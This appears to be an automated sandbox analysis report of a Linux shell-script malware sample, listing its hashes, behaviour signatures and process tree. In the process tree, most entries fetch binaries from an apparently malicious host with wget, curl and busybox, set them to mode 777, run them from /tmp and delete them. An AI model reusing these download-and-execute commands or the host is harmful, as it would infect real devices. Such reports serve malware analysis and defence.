Analysis
-
max time kernel
150s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipsel image:debian9-mipsel-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
18/10/2024, 02:13
Static task
static1
Behavioral task
behavioral1
Sample
930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048.sh
-
Size
10KB
-
MD5
47e14a3295dfe930e05250b0f07d1ecb
-
SHA1
a9bd5853962549cda39520d99b1b5a559f03623e
-
SHA256
930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048
-
SHA512
11264a8416d0e1690b6f118458e7aabf6c7e02764ffea9a1ef8f8aeaffd235d81cba95e368cd26ee7bc0e69033b2db65b0f4a9f72e0827b596d1532f4a7ab21d
-
SSDEEP
96:Y99UNLTZTxTkvUxpyLeBe5el6WLtt8cghrHGRB5bLWGXzpzBzSvTuueVjujejxwG:RNH9VkvBIxLgoHN9VkUX9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 20 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
System Network Configuration Discovery 1 TTPs 60 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048.sh/tmp/930cdbbed137519723e5bde222b703afedb811df324f8862848e05c6079ff048.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- System Network Configuration Discovery
PID:719
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- System Network Configuration Discovery
PID:773
-
-
/bin/chmodchmod 777 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP./P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:783
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- System Network Configuration Discovery
PID:785
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- System Network Configuration Discovery
PID:791
-
-
/bin/chmodchmod 777 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ./QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:802
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- System Network Configuration Discovery
PID:803
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- System Network Configuration Discovery
PID:831
-
-
/bin/chmodchmod 777 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy./2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:835
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- System Network Configuration Discovery
PID:836
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- System Network Configuration Discovery
PID:839
-
-
/bin/chmodchmod 777 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ./QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:843
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- System Network Configuration Discovery
PID:844
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- System Network Configuration Discovery
PID:847
-
-
/bin/chmodchmod 777 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F./uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J./Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:858
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- System Network Configuration Discovery
PID:859
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- System Network Configuration Discovery
PID:862
-
-
/bin/chmodchmod 777 GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/GtTyy46k97PMs25DsIOKewPL4B9poyk8id./GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm GtTyy46k97PMs25DsIOKewPL4B9poyk8id2⤵PID:866
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- System Network Configuration Discovery
PID:867
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- System Network Configuration Discovery
PID:870
-
-
/bin/chmodchmod 777 gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7./gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:874
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- System Network Configuration Discovery
PID:875
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- System Network Configuration Discovery
PID:878
-
-
/bin/chmodchmod 777 DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln./DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N./O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC./QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:898
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- System Network Configuration Discovery
PID:902
-
-
/bin/chmodchmod 777 a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N./a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX./zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- System Network Configuration Discovery
PID:918
-
-
/bin/chmodchmod 777 LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq./LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- System Network Configuration Discovery
PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- System Network Configuration Discovery
PID:926
-
-
/bin/chmodchmod 777 P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP./P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm P6R3WSmwSuUWCuL6JlbnIzajBHDAk41oUP2⤵PID:930
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- System Network Configuration Discovery
PID:931
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- System Network Configuration Discovery
PID:934
-
-
/bin/chmodchmod 777 QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ./QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm QhDhkUA3urMWjDTs2QqtGrjpxzEOztGCFZ2⤵PID:937
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- System Network Configuration Discovery
PID:938
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- System Network Configuration Discovery
PID:941
-
-
/bin/chmodchmod 777 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy./2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm 2cUbf27BLKVJmBg87LpNyrtMmVcTmCJ4dy2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ./QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm QN3gcOFIE188bMPeeH01jBpJU1zU9SirWJ2⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- System Network Configuration Discovery
PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- System Network Configuration Discovery
PID:957
-
-
/bin/chmodchmod 777 uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F./uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm uiGhCVrMItJNxoFiXFVXA06wsRHKWfGL6F2⤵PID:961
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- System Network Configuration Discovery
PID:962
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- System Network Configuration Discovery
PID:965
-
-
/bin/chmodchmod 777 Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J./Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm Gq448EoXUXKKKHWNvIcCOYOsg9AsRMlP6J2⤵PID:969
-
Network
MITRE ATT&CK Enterprise v15
Downloads